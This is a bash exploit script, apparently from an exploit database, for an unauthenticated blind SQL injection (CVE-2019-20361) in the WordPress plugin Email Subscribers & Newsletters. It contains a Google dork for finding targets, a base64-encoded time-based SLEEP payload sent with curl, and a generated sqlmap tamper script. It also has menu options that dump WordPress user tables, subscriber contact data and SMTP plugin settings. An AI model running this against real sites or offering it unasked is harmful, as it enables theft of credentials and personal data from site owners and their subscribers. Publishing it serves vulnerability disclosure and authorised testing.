扫码分享
验证:
体验盒子# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
main () {
header
if [ "$#" -ne 1 ]; then
echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
exit
fi
url=$1
echo ' Target URL : ' "$url"
echo ' Generating sqlmap tamper script in /tmp'
gen_sqlmap_tamper
sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3"
echo ' SQLMap base command : ' "$sqlmap_cmd"
while true
do
sleep 1
echo ''
echo " Possible choices: "
echo ''
echo "0) Exit"
echo "1) Simple vulnerability test SLEEP(5)"
echo "2) Vulnerability test with SQLMap "
echo "3) Get WP users data"
echo "4) Get subscribers information"
echo "5) Get 'Simple WP SMTP' settings"
echo ''
echo -n ' Choice number => '
read n
case $n in
0) exit ;;
1) echo 'Testing SLEEP(5)...'
{ time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;;
2) $sqlmap_cmd ;;
3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;;
4) $sqlmap_cmd -T wp_ig_contacts --dump ;;
5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;;
*) echo "Invalid option" ;;
esac
done
}
header () {
echo ''
echo ' ################################################################################################';
echo ' # ___ ___ ___ ______ #';
echo ' #/\\ /\\ /\\ /\\/\\___ #';
echo ' # /::\\ /::\\ /::\\ /::\\ \:\\/\\#';
echo ' #/:/\ \\ /:/\:\\ /:/\:\\ /:/\:\\ \:\\ \:\\ #';
echo ' # _\:\~\ \\ /:/\:\\ /:/\:\\ /::\~\:\\/::\\/::\__\#';
echo ' #/\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/#';
echo ' #\:\ \:\ \/__\:\\ /:/\:\/\ \/__\:\~\:\ \/__/:/\/__/\/:// #';
echo ' # \:\ \:\__\\:\/:// \:\ \:\__\\:\ \:\__\/://\::/__/#';
echo ' #\:\/:// \:\/:// \:\/:// \:\ \/__/\/__/\:\__\#';
echo ' # \::// \::// \::// \:\__\\/__/#';
echo ' #\/__/ \/__/ \/__/ \/__/ #';
echo ' # ___ ___ ___ ___#';
echo ' #/\\ /\\ /\\ /\\ #';
echo ' # /::\\ /::\\ /::\\ /::\\#';
echo ' #EXPLOIT /:/\:\\ /:/\ \\ /:/\:\\ /:/\:\\ #';
echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\\ _\:\~\ \\ /::\~\:\\ /:/\:\\#';
echo ' # Unauthenticated Blind SQL Injection/:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #';
echo ' #\:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\\\/__/ #';
echo ' # \:\ \:\__\\:\ \:\__\\:\ \:\__\\:\\ #';
echo ' #\:\ \/__/ \:\/:// \:\ \/__/ \:\\#';
echo ' # \:\__\\::// \:\__\\:\__\ #';
echo ' #KBAZ\/__/ \/__/ \/__/ \/__/ #';
echo ' ##';
echo ' ##';
echo ' ################################################################################################';
echo ''
}
raw_commands () {
echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100"'","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' |base64 -w 0
{ time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable'
sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3
-T wp_users,wp_usermeta --dump
-T wp_ig_contacts --dump
--sql-query 'select * from wp_options where option_name="swpsmtp_options"'
}
gen_sqlmap_tamper () {
touch /tmp/__init__.py
cat << _END > /tmp/tamper_CVE-2019-1356989.py
#!/usr/bin/env python
import base64
import urllib
def tamper(payload, **kwargs):
#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}
#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = count+1, updated_at = '1595001866'
param= '{"contact_id":"'
param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100"
param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}'
#print(param%payload)
return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '')
_END
}
main $@
体验盒子
